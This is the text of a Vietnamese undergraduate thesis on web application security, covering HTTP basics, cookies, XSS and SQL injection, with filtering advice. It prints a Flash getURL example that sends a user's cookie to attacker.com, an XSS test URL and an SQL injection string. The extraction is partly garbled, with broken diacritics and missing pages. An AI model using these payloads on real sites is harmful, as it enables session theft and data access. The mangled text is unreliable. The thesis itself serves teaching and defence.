Trờng đại học vinh Khoa công nghệ thông tin Trần văn quế Nghiên cứu số vấn đề bảo mật ứng dụng web đồ án tốt nghiệp đại học kỹ s công nghệ thông tin Vinh - 2010 Đồ án tốt nghiệp web Nghiên cứu số vấn đề bảo mật ứng dụng Lời nói đầu Trong công đổi míi kh«ng ngõng cđa khoa häc kü tht c«ng nghƯ, nhiều lĩnh vực đà phát triển vợt bậc đặc biệt lĩnh vực công nghệ thông tin Mạng máy tính đợc hình thành từ nhu cầu muốn chia sẻ tài nguyên dùng chung nguồn liệu Nếu hệ thống mạng, liệu phải đợc in giấy ngời khác hiệu chỉnh sử dụng đợc chép lên thiết bị lu trữ khác tốn nhiều thời gian công sức Khi ngời làm việc môi trờng độc lập mà nối máy tính với máy tính nhiều ngời khác, ta sử dụng máy tính khác máy in Mạng máy tính đợc tổ chức sử dụng chủ yếu để chia sẻ, dùng chung tài nguyên vµ cho phÐp giao tiÕp trùc tun bao gåm gưi nhận thông điệp hay th điện tử, giao dịch, thơng mại điện tử, tìm kiếm thông tin mạng Chính vai trò quan trọng mạng máy tính với nhu cầu sống ngời, kiến thức đà đợc học trờng chúng em đà chọn đồ án: Nghiên cứu số vấn đề bảo mật Web Với nội dung đợc đề cập nghiên cứu mô hình mạng LAN (Local Area Network mạng nội bộ) quản trị th ®iƯn tư néi bé víi phÇn mỊm Microsoft Exchange Server 2003 Do thời gian kiến thức có hạn nên viết hạn chế, mong đợc góp ý Thầy Cô giáo em xin chân thành cảm ơn thầy giáo TS: Nguyễn Trung Hoà đà tận tình giúp đỡ để em hoàn thành đồ án Xin trân trọng cảm ơn! Sinh viên thực hiện: Trần Văn Quế Đồ án tốt nghiệp web Nghiên cứu số vấn đề bảo mật ứng dụng Nghiên cứu số vấn đề bảo mật ứng dụng web Nh ta đà biết nay, khái niệm mạng toàn cầu - Internet không mẻ Nó đà trở nên phổ biến tới mức không cần phải giải thêm tạp chí kỹ thuật, tạp chí khác tràn ngập viết dài, ngắn Internet Khi tạp chí thông thờng trọng vào Internet đây, tạp chí kỹ thuật lại tập trung vào khía cạnh khác: an toàn thông tin Đó trình tiến triển hợp logic: vui thích ban đầu siêu xa lộ thông tin, bạn định nhận thấy không cho phép bạn truy nhập vào nhiều nơi giới, Internet cho phép nhiều ngời không mời mà tự ý ghé thăm máy tính bạn Thực vậy, Internet có kỹ thuật tut vêi cho phÐp mäi ngêi truy nhËp, khai th¸c, chia sẻ thông tin Nhng nguy dẫn đến thông tin bạn bị h hỏng phá huỷ hoàn toàn Theo số liệu CERT(Computer Emegency Response Team - Đội cấp cứu máy tính), số lợng vụ công Internet đợc thông báo cho tổ chức 200 vào năm 1989, khoảng 400 vào năm 1991, 1400 vào năm 1993, 2241 vào năm 1994 Những vụ công nhằm vào tất máy tính có mặt Internet, máy tính tất công ty lớn nh AT&T, IBM, trờng đại học, quan nhà nớc, tổ chức quân sự, nhà băng Mét sè vơ tÊn c«ng cã quy m« khỉng lồ (có tới 100.000 máy tính bị công) Hơn nữa, số phần tảng băng Một phần lớn vụ công không đợc thông báo, nhiều lý do, kể lo bị uy tín, đơn giản ngời quản trị hệ thống không hay biết công nhằm vào hệ thống họ Sinh viên thực hiện: Trần Văn Quế Đồ án tốt nghiệp Nghiên cứu số vấn đề bảo mật ứng dụng web CHƯƠNG GIớI THIệU øNG DơNG WEB Kh¸i niƯm øng dơng Web (Web Application) ứng dụng Web ứng dụng chủ/khách sử dụng giao thức HTTP để tơng tác với ngời dùng hay hệ thống khác Trình khách dành cho ngời sử dụng thờng trình duyệt web nh IE, Netcape Navigator Ngời dùng gửi nhận thông tin từ trình chủ thông qua việc tác động vào trang web Các chơng trình trang thông tin, trao đổi mua bán, diễn đàn, gửi nhận email Tốc độ phát triển ứng dụng web nhanh, ngày Web thờng đợc viết ngôn ngữ Java hay ngôn ngữ tơng tự chạy máy chủ phân tán, kết nối đến nhiều ngn d÷ liƯu Mét øng dơng web thêng cã kiÕn trúc gồm: - Lớp trình bày: Lớp có nhiệm vụ hiển thị liệu cho ngời dùng, có thêm ứng dụng tạo bố cục cho trang web - Lớp ứng dụng: nơi xử lý cđa øng dơng web, nã sÏ xư lý th«ng tin ngời dùng yêu cầu, đa định, gửi kết đến lớp trình bày lớp thờng đợc cài đặt ngôn ngữ Java, NET, ASP, PHP đợc triển khai trình chủ nh IBM, Apache,IIS - Lớp liệu: thờng hệ quản trị sở liệu(DBMS) chịu trách nhiệm quản lý file liệu quyền sử dụng Mô hình hoá ứng dụng web Sinh viên thực hiện: Trần Văn Quế Đồ án tốt nghiệp web Nghiên cứu số vấn đề bảo mật ứng dụng Trong đó: - Trình khách( hay gọi trình duyệt): IE, NN - Trình chủ: Apache, IIS - Hệ quản trị sở liệu: SQL server, My SQL, DB2, Access Mô tả hoạt động ứng dụng web Đầu tiên trình duyệt gửi yêu cầu đến trình chủ web thông qua lệnh GET, POST giao thức HTTP, trình chủ lúc cho thực thi chơng trình đợc xây dựng từ nhiều ngôn ngữ khác trình chủ yêu cầu diễn dịch thực thi trang ASP, PHP theo yêu cầu trình khách Tuỳ theo tác vụ chơng trình đợc cài đặt mà xử lý, tính toán kết nối đến sở liệu, lu thông tin trình khách gửi đếnvà từ trả cho trình khách luồng liệu có định dạng theo giao thức HTTP gồm phần: - Header mô tả thông tin gói liệu thuộc tính, trạng thái trao đổi trình duyệt Webserver - Body phần nội dung liệu mà server gửi client, file HTML, hình ảnh, đoạn phim hay trang tài liệu Các vấn đề bảo mật Web Mặc dù phủ nhận cải tiến nâng cao đáng kể nay, nh vấn đề bảo mật ứng dụng Web không ngừng tăng lên Nguyên nhân xuất phát từ đoạn mà không phù hợp Nhiều điểm yếu nghiêm trọng hay lỗ hổng cho phép hacker xâm nhập thẳng truy cập vào sở liệu tách lấy Sinh viên thực hiện: Trần Văn Quế Đồ án tốt nghiệp Nghiên cứu số vấn đề bảo mật ứng dụng web liệu nhạy cảm Nhiều sở liệu chứa thông tin giá trị (nh chi tiết cá nhân, thông tin tài chính) khiến chúng trở thành đích nhắm thờng xuyên hầu hết hacker Một nghiên cứu gần 75% công mạng đợc thực mức ứng dụng Web ã Website ứng dụng Web liên quan phải sẵn sàng 24/7 để cung cấp dịch vụ theo yêu cầu khách hàng, yêu cầu từ phía nhân viên, nhà cung cấp nhiều ngời liên quan khác ã Tờng lửa, SLL bảo vệ ứng dụng Web trớc hoạt động hacking, đơn giản truy cập vào Website phải để chế độ public để ghé thăm Website đợc Tất hệ thống sở liệu đại (nh Microsoft SQL Server, Oracle, MySQL) ®Ịu cã thĨ truy cËp qua mét sè cỉng thĨ (nh cỉng 80, 433) Nếu muốn, ngời kết nối trực tiếp tới sở liệu cách vợt qua chế bảo mật hệ điều hành Các cổng để mở nhằm cho phép liên lạc với hoạt động giao thông mạng hợp pháp, hình thành nên lỗ hổng lớn nguy hiểm ã Các ứng dụng Web thờng truy cập liệu cuối nh sở liệu khách hàng, điểu khiển liệu có giá trị ®ã rÊt khã ®Ĩ cã thĨ tut ®èi an toµn ã Hầu hết ứng dụng Web tự tạo, có đợc kiểm tra trình độ so với phần mềm loại Do ứng dụng tùy biến thờng dễ bị công Có thể nói ứng dụng Web cổng vào (gateway) sở liệu, ứng dụng tùy biến Chúng không đợc phát triển với mức bảo mật tốt qua kiểm tra bảo mật thông thờng Sinh viên thực hiện: Trần Văn Quế Đồ án tốt nghiệp Nghiên cứu số vấn đề bảo mật ứng dụng web CHƯƠNG GIớI THIệU SƠ LƯợC Về CáC Kỹ THUậT TấN CÔNG ứNG DụNG WEB CáC KHáI NIệM THUậT NGữ LIÊN QUAN 1.1 Hacker Hacker thuật ngữ dùng để chuyên kẻ phá hoại hệ thống mạngHacker thờng chuyên gia máy tính Hacker không tạo kẽ hở cho hệ thống, nhng hacker lại ngời am hiểu hệ điều hành, hệ quản trị sở liệu, ngôn ngữ lập trìnhHọ sử dụng kiến thức việc tìm tòi khai thác lỗ hổng hƯ thèng m¹ng Mét sè hacker chØ dõng l¹i ë việc phát thông báo lỗi tìm đợc cho nhà bảo mật hay ngời phát triển chơng trình, họ đợc xem nh WhiteHat (Hacker nón trắng) Một số hacker dựa vào lỗ hổng thực việc khai thác trái phép nhằm mục đích phá hoại hay mu lợi riêng, ngời bị xem nh BlackHat( Hacker nón đen) Vì tính chất phổ biến thuật ngữ hacker, nên phần trình bày, sử dụng hacker thay cho kẻ công 1.2 HTTP Header HTTP Header phần đầu (header) thông tin mà trình khách trình chủ gửi cho Những thông tin trình khách gửi cho trình chủ đợc gọi HTTP requests (yêu cầu) trình chủ gửi cho trình khách HTTP responses (trả lời) Thông thờng, HTTP header gồm nhiều dòng, dòng chứa tên tham số giá trị Một số tham số đợc dùng header yêu cầu header trả lời, số khác đợc dùng riêng loại Ví dụ: ã Header yêu cầu: Get /tintuc/homnay.asp HTTP/1.1 Accept: */* Accept-Language: en-us Connection: Keep-Alive Host: localhost Referer: http://localhost/lienket.asp Sinh viên thực hiện: Trần Văn Quế Đồ án tốt nghiệp Nghiên cứu số vấn đề bảo mật øng dông web User-Agent: Mozilla/4.0 {compatible: MSIE 5.5; Windows NT 5.0} Accept-Encoding: gzip, deflate o Dòng đầu dòng yêu cầu cho biết phơng thức yêu cầu (GET POST), địa yêu cầu (/tintuc/homnay.asp) phiên HTTP (HTTP/1.1) o Tiếp theo tham số Chẳng hạn nh: Accept-Language: Cho biết ngôn ngữ dùng trang web Host: Cho biết địa máy chủ Referer: Cho biết địa trang web tham chiếu tới o Header cđa HTTP request sÏ kÕt thóc b»ng mét dòng trống ã Header trả lời: HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 13 Jul 2000 05:46:53 GMT Content-Length: 2291 Content-Type: text/html Set-cookie: ASPSESSIONIDQQGGGNCC=LKLDFFKCINFLDMFHCBCBMFLJ; Path=/ Cache-control: private ……… o Dòng đầu dòng trạng thái biết phiên HTTP đợc dùng (HTTP/1.1), mà trạng thái (200) trạng thái (OK) o Tiếp theo tham số o Tiếp theo dòng trống để báo hiệu kết thúc header, phần thân HTTP response Sinh viên thực hiện: Trần Văn Quế Đồ án tốt nghiệp web Nghiên cứu số vấn đề bảo mật ứng dụng 1.3 Session HTTP giao thức hớng đối tợng tổng quát, phi trạng thái, nghĩa HTTP không lu trữ trạng thái làm việc trình duyệt với trình chủ Sự thiếu sót gây khó khăn cho số ứng dụng Web, trình chủ đợc trớc trình duyệt đà có trạng thái Vì thế, để giải vấn đề này, ứng dụng Web đa khái niệm phiên làm việc (Session) Còn SessionID chuỗi để chứng thực phiên làm việc Một số trình chủ sÏ cung cÊp mét SessionID cho ngêi dïng hä xem trang web trình chủ Để trì phiên làm việc sessionID thờng đợc lu vào: Biến trªn URL  BiÕn Èn Form  Cookie 1.4 Cookie Cookie phần liệu nhỏ có cấu trúc đợc chia sẻ website browser ngời dùng Cookies đợc lu trữ dới file liệu nhỏ dạng text (size dới 4k) Chúng đợc site tạo để lu trữ/truy tìm/nhận biết thông tin ngời dùng đà ghé thăm site vùng họ qua site Những thông tin bao gồm tên/định danh ngời dùng, mật khẩu, sở thích, thói quenCookie đợc browser ngời dùng chấp nhận lu đĩa cứng máy mình, browser hỗ trợ cookie Sau lần truy cập vào site, thông tin ngời dùng đợc lu trữ cookie lần truy cập sau đến site đó, web site dùng lại thông tin cookie (nh thông tin liên quan đến việc đăng nhập vào forum) mà ngời sử dụng làm lại thao tác đăng nhập hay phải nhập lại thông tin khác Vấn đề đặt có nhiều site quản lý việc dùng lại thông tin cookie không xác, kiểm tra không đầy đủ mà hóa thông tin cookie sơ hở giúp cho hacker khai thác để vợt qua cách cửa đăng nhập, đoạt quyền điều khiển site Sinh viên thực hiện: Trần Văn Quế Đồ án tốt nghiệp Nghiên cứu số vấn đề bảo mật ứng dụng web Cookies thờng có thành phần sau : + Tên: ngời lập trình web site chọn + Domain: tên miền từ server mà cookie đợc tạo gửi + Đờng dẫn: thông tin đờng dẫn web site mà bạn xem + Ngày hết hạn: thời điểm mà cookie hết hiệu lực + Bảo mật: Nếu giá trị đựơc thiết lập bên cookie, thông tin đựơc mà hoá trình truyền server browser + Các giá trị khác: liệu đặc trng đợc web server lu trữ để nhận dạng sau giá trị ko chứa khoảng trắng, dấu chấm, phẩy bị giới hạn khoảng 4k 1.5 Proxy Proxy cung cÊp cho ngêi sư dơng truy xt Internet nh÷ng nghi thức đặc biệt tập nghi thức thực thi dual_homed host bassion host Những chơng tr×nh client cđa ngêi sư dơng sÏ qua trung gian proxy server thay thÕ cho server thËt sù mµ ngêi sử dụng cần giao tiếp Proxy server xác định yêu cầu từ client định đáp ứng hay không đáp ứng, yêu cầu đợc đáp ứng, proxy server sÏ kÕt nèi víi server thËt thay cho client tiếp tục chuyển tiếp yêu cầu từ client ®Õn server, cịng nh tr¶ lêi cđa server ®Õn client Vì proxy server giống cầu nối trung gian server client GIớI THIệU SƠ LƯợC CáC Kỹ THUậT TấN CÔNG Sau khái niệm sơ lợc kĩ thuật công ứng dụng Web đà đợc phân loại dựa mức độ gây tác hại ®èi víi øng dơng 2.1 KiĨm so¸t truy cËp web (Web access control) Th©m nhËp hƯ thèng qua cưa sau (Back door) Trong trình thiết kế ứng dụng, ngời phát triển ứng dụng cài cửa sau (back door) để sau thâm nhập vào hệ thống cách dễ dàng 2.2 Chiếm hữu phiên làm viêc ấn định phiên làm việc (Session Fixation) Sinh viên thực hiện: Trần Văn Quế 10 Đồ án tốt nghiệp Nghiên cứu số vấn đề bảo mật ứng dụng web Là kĩ thuật công phổ biến hiên nay, đồng thời vấn đề bảo mật quan trọng nhà phát triển web ngời sử dụng web Bất kì website cho phép ngời sử dụng đăng thông tin mà kiểm tra chặt chẽ đoạn mà nguy hiểm tiềm ẩn lỗi XSS XSS ? Cross-Site Scripting hay đợc gọi tắt XSS (thay gọi tắt CSS để tránh nhầm lẫn với CSS-Cascading Style Sheet HTML) kĩ thuật công cách chèn vào website động (ASP, PHP, CGI, JSP ) thẻ HTML hay đoạn mà script nguy hiểm gây nguy hại cho ngời sử dụng khác Trong đó, đoạn mà nguy hiểm đựơc chèn vào hầu hết đợc viết Client-Site Script nh JavaScript, JScript, DHTML thẻ HTML Kĩ thuật công XSS đà nhanh chóng trở thành lỗi phổ biến Web Applications mối đe doạ chúng ngời sử dụng ngày lớn XSS hoạt động nh ? Về XSS nh SQL Injection hay Source Injection, yêu cầu (request) đợc gửi từ máy client tới server nhằm chèn vào thông tin vợt tầm kiểm soát server Nó request đợc gửi từ form liệu URL nh Code: http://www.example.com/search.cgi?query=alert('XSS was found !') Với đoạn mà URL chèn vào nh trình duyệt bạn lên thông báo "XSS was found !" Các đoạn mà thẻ không bị giới hạn chúng hoàn toàn thay file nguồn server khác thông qua thuộc tính src thẻ Cũng lẽ mà cha thể lờng hết đợc độ nguy hiểm lỗi XSS Sinh viên thực hiện: Trần Văn Quế 17 Đồ án tốt nghiệp Nghiên cứu số vấn đề bảo mËt øng dơng web Nhng nÕu nh c¸c kÜ tht công khác làm thay đổi đợc liƯu ngn cđa web server (m· ngn, cÊu tróc, c¬ sở liệu) XSS gây tổn hại website phía client mà nạn nhân trực tiếp ngời khách duyệt site Tất nhiên hacker sử dụng kĩ thuật đề deface website nhng công vào bề mặt website Thật vậy, XSS Client-Side Script, đoạn mà chạy trình duyệt phía client XSS không làm ảnh hởng ®Õn hƯ thèng website n»m trªn server Mơc tiªu tÊn công XSS không khác ngời sử dụng khác website, họ vô tình vào trang có chứa đoạn mà nguy hiểm hacker để lại họ bị chuyển tới website khác, đặt lại homepage, hay nặng mật khẩu, cookie chí máy tính bạn bị cài loại virus, backdoor, worm 2.2 Tấn công XSS flash Ngoài cách đa đoạn mà nguy hiểm hacker lợi dụng tập tin flash để đánh cắp thông tin Macromedia Flash cho phép lập trình ngôn ngữ kịch đà đợc xây dựng sẵn Flash ActionScript ActionScript có cú pháp đơn giản tơng tù nh JavaScript, C hay PERL VÝ dơ hµm getURL() dùng để gọi trang web khác, tham số thờng URL chẳng hạn nh http://www.yahoo.com getURL(http://www.yahoo.com) Tuy nhiªn cã thĨ thay thĨ URL b»ng JavaScript: getURL(“javascript:alert(document.cookie)”) VÝ dụ làm xuất bảng thông báo cha cookie cđa trang web chøa tËp tin flash ®ã Nh trang web đà bị công, cách chèn đoạn JavaScript vào ứng dụng web thông qua tập tin flash Một ví dụ khác rõ cách công là: Đây đoạn lệnh tập tin flash đợc thi hành tập tin flash đợc đọc: getURL(javascript:location(http://www.attacker.com? newcookie=+document.cookie)) Sinh viên thực hiện: Trần Văn Quế 18 Đồ án tốt nghiệp Nghiên cứu số vấn đề bảo mật ứng dụng web Nh vËy lµ ngêi dïng xem trang web chøa tập tin flash cookie họ trang web chứa tập tin flash tạo sÏ gưi vỊ cho hacker 2.3 Ph¸t hiƯn XSS cách nào? Nếu nh sử dụng mà nguồn chơng trình có sẵn tham khảo danh sách lỗ hổng chơng trình bạn trang web chứa thông tin bảo mật nh securityfocus.com, securiteam.com, Tuy nhiên website đợc tự viết mà nguồn áp dụng phơng pháp Trong trờng hợp ta cần đến chơng trình scanner tự ®éng NÕu sư dơng m«i trêng Windows chóng ta dùng N-Stealth hay AppScan, chơng trình scan tuyệt, ta không kiểm tra đợc lỗi XSS mà cho phép ta kiểm tra lỗi khác Website đó, Server Tất nhiên lúc cần kiểm tra tất cả, nh muốn kiểm tra lỗi XSS có website, cần sử dụng screamingCSS Đó Perl Script mở kết nối tới website (sử dụng Perl's socket) để kiểm tra lỗi XSS sử dụng môi trờng Unix lẫn Windows 2.4 Cách phòng chống Với liệu, thông tin nhập ngời dùng, ngời thiết kết ứng dụng Web cần phải thực vài bớc sau: o Tạo danh sách thẻ HTML đợc phép sử dụng o Xóa bỏ thẻ o Lọc đoạn mà JavaScript/Java/VBScript/ActiveX/Flash Related o Lọc dấu nháy đơn hay kép o Lọc kí tự Null ( khả thêm đoạn mà sau kí tự Null khiến cho ứng dụng dù đà lọc bỏ thẻ không nhận ứng dụng nghĩ chuỗi đà kết thúc từ kí tự Null này) o Xóa kÜ tù “>”, “ Sinh viên thực hiện: Trần Văn Quế 27 Đồ án tốt nghiệp Nghiên cứu số vấn đề bảo mật ứng dụng web Thì chắn bị lỗi SQL injection, ta nhập vào trờng thứ nhÊt vÝ dô nh: ‘+(SELECT TOP FieldName FROM TableName)+’ Lúc câu truy vấn là: INSERT INTO TableName VALUES(‘’+(SELECT TOP FieldName FROM TableName)+’’,’abc’,’def’) Khi ®ã, lóc thùc lệnh xem thông tin, xem nh ta đà yêu cầu thực thêm lệnh là: SELECT TOP FieldName FROM TableName 3.3.3 Cách phòng chống Việc công the SQL Injection dựa vào câu thông báo lỗi việc phòng chống hay không cho hiển thị thông điệp lỗi cho ngời dùng cách thay lỗi thông b¸o b»ng trang ngêi ph¸t triĨn thiÕt kÕ xảy ứng dụng Ta thiết lập trang ASP báo lỗi tùy biến nh sau: Tạo trang báo lỗi error.asp lu vào th mơc chøa trang web Më tr×nh Internet Services Manager MMC Më réng ph¹m vi theo dâi Default Web Site bạn Kích chuột phải vào th mơc chøa trang web vµ chän Properties KÝch vµo tab Custom Errors Cuén xuèng vµ kÝch chän vµo 500;100 HTTP error vµ kÝch vµo Edit Properties ThiÕt lập Message Type thành URL Thay đổi URL thành /error.asp (không để dấu trích kép) Sinh viên thực hiện: Trần Văn Quế 28 Đồ án tốt nghiệp web Nghiên cứu số vấn đề bảo mật ứng dụng Kích OK để trở lại MMC Xây dựng hàm để kiểm soát liệu đầu vào cách cẩn thận tức liệu vào đợc chấp nhận loại bỏ tất liệu không liên quan mà cụ thể nên loại bỏ ký tự đặt biệt, khoảng trắng, từ khoá liên quan đến việc truy cập, sửa đổi cập nhật liệu - Thủ thuật khử nháy đơn (') - Thủ thuật từ chối liệu bất hợp lệ - Thủ thuật ràng buộc nhập liệu hợp lÖ Sử dụng VBScript xây dựng hàm sau: - Khử nháy đơn function escape(input) input = replace(input,"'",""") escape = input end function - Tõ chèi d÷ liƯu bÊt hỵp lƯ function validate_string( input) known_bad = array("select","insert","update","delete","drop"," ","'","@ @","% %",";",">","